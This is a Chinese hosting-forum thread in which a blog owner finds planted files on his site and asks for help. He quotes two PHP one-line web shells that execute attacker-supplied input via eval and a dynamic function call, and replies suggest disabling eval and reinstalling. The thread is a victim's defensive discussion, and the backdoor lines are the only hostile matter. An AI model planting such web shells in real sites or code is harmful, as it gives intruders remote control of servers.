全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 4377|回复: 18
打印 上一主题 下一主题

SOS 求助,我的小站难道被针对了?

[复制链接]
跳转到指定楼层
1#
发表于 2017-10-26 23:15:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
昨天发现被挂了代码后,修改了后台管理员密码和后台登陆路径。今晚发现网站的根目录有个helper.class.php的文件,晚上9点半刚生成的。我看饿了下代码是
<?php $_GET[a]($_POST);?>
2#
发表于 2017-10-26 23:18:20 | 只看该作者
这个好像是一句话
3#
 楼主| 发表于 2017-10-26 23:21:50 | 只看该作者
Gh0st 发表于 2017-10-26 23:18
这个好像是一句话

这怎么弄上来的?晕。。。不知道哪里有漏洞。。。还没堵上
4#
 楼主| 发表于 2017-10-26 23:40:21 | 只看该作者
还有个 Uninstall.php里有
<?php @eval($_POST[finish]);?>
5#
发表于 2017-10-26 23:48:57 来自手机 | 只看该作者
禁用函数eval
6#
发表于 2017-10-26 23:49:14 | 只看该作者
估计你那源码里一堆洞了
7#
 楼主| 发表于 2017-10-26 23:50:58 | 只看该作者
刚刚nginx里启用访问日志access.log准备看看有没有什么可以得情况。。。之前都把日志关了。。哎。。
8#
 楼主| 发表于 2017-10-26 23:52:20 | 只看该作者
maro666 发表于 2017-10-26 23:49
估计你那源码里一堆洞了

什么源码?我插件一个没用,就是博客的外观皮肤用了别人的。
9#
发表于 2017-10-27 10:01:05 | 只看该作者
20140727 发表于 2017-10-26 23:52
什么源码?我插件一个没用,就是博客的外观皮肤用了别人的。

皮肤里面洞才多
10#
发表于 2017-10-27 10:02:51 | 只看该作者
遍地洞啊。建议 备份数据库 程序重新覆盖一遍吧。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-13 04:15 , Processed in 0.063065 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表